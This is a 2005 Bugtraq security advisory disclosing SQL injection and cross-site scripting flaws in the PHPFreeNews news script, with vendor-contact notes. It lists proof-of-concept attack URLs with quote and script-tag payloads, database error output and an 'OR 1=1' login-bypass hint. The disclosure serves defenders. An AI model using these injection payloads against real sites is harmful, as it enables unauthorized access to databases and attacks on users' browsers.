PHPFreeNews V1.40 and prior Multiple Vulnerabilities

h4cky0u_at_gmail.com
Date: 08/17/05

  • Next message: Jay D. Dyson: "Re: Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product"
    Date: 17 Aug 2005 19:24:45 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) PHPFreeNews V1.40 and prior Multiple Vulnerabilities

    SEVERITY:
    =========
    High

    SOFTWARE:
    =========
    PHPFreeNews
    http://www.phpfreenews.co.uk/

    INFO:
    =====
    PHPFreeNews is a free PHP Script which allows you to display news headlines and articles on your website.

    DESCRIPTION:
    ============
    PHPFreeNews Version V1.40 and earlier are vulnerable to various SQL Injection and XSS attacks. Here are some examples:

    --==-- SQL Injection --==--

    http://www.site.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0

    http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='

    http://www.site.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0

    http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in \somepath\www\phpfn\Inc\ListingFunctions.php on line 92
    Query failed : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate

    Also http://www.site.com/phpfn/Inc/AccessControl.php type for user and pass some sql injection string like "OR" 1=1 and you will get an error.

    --==-- XSS --==--

    http://www.site.com/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found By Matrix_Killer');</script>&CatID=0

    http://www.site.com/phpfn/SearchResults.php?Match='><script>alert('Matrix_Killer OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0

    http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell Year');</script>

    http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o Please StoP !');</script>&SearchNews=Search&CatID=0

    http://www.site.com/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer -> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0

    VENDOR STATUS
    =============

    Vendor contacted on the 17th of August.

    Vendor Reply (17th of August) - All the bugs have been fixed and will be included in the next release.

    CREDITS:
    ========

    This vulnerability was discovered and researched by -

    matrix_killer of h4cky0u Security Forums.

    mail : matrix_k at abv.bg

    web : http://www.h4cky0u.org

    Co-Researcher -

    h4cky0u of the h4cky0u Security Forums.

    mail : h4cky0u@gmail.com

    web : http://www.h4cky0u.org

    Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

    ORIGINAL:
    =========
    http://h4cky0u.org/viewtopic.php?t=1977


  • Next message: Jay D. Dyson: "Re: Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product"

    Relevant Pages

    • [Full-disclosure] PHPFreeNews v1.40 and prior Multiple Vulnerabilities
      ... PHPFreeNews V1.40 and prior Multiple Vulnerabilities ... Vendor contacted on the 17th of August. ... matrix_killer of h4cky0u Security Forums. ...
      (Full-Disclosure)
    • [Full-Disclosure] its all about timing
      ... Why do people look for vulnerabilities? ... They publish vuln info because they have customers that pay (or ... Full Disclosure issue must take into account the ... report vulns primarily to the vendor, in the hope that the vendor will ...
      (Full-Disclosure)
    • Re: ROI (ROSI?) on IDP devices
      ... vulnerabilities go all the way up the application stack. ... after 2 to 7 days by IPS vendor. ... I'd say that's a useless IDP system, ... The signatures are lagging too far behind the vulnerabilities. ...
      (Focus-IDS)
    • Vulnerability Type Distributions in CVE
      ... Vulnerability Type Distributions in CVE ... Table 4 Analysis: Open and Closed Source ... lead to publicly reported vulnerabilities, ... are in the top 3 for OS vendor advisories. ...
      (Bugtraq)
    • [Full-disclosure] Vulnerability Type Distributions in CVE
      ... Vulnerability Type Distributions in CVE ... Table 4 Analysis: Open and Closed Source ... lead to publicly reported vulnerabilities, ... are in the top 3 for OS vendor advisories. ...
      (Full-Disclosure)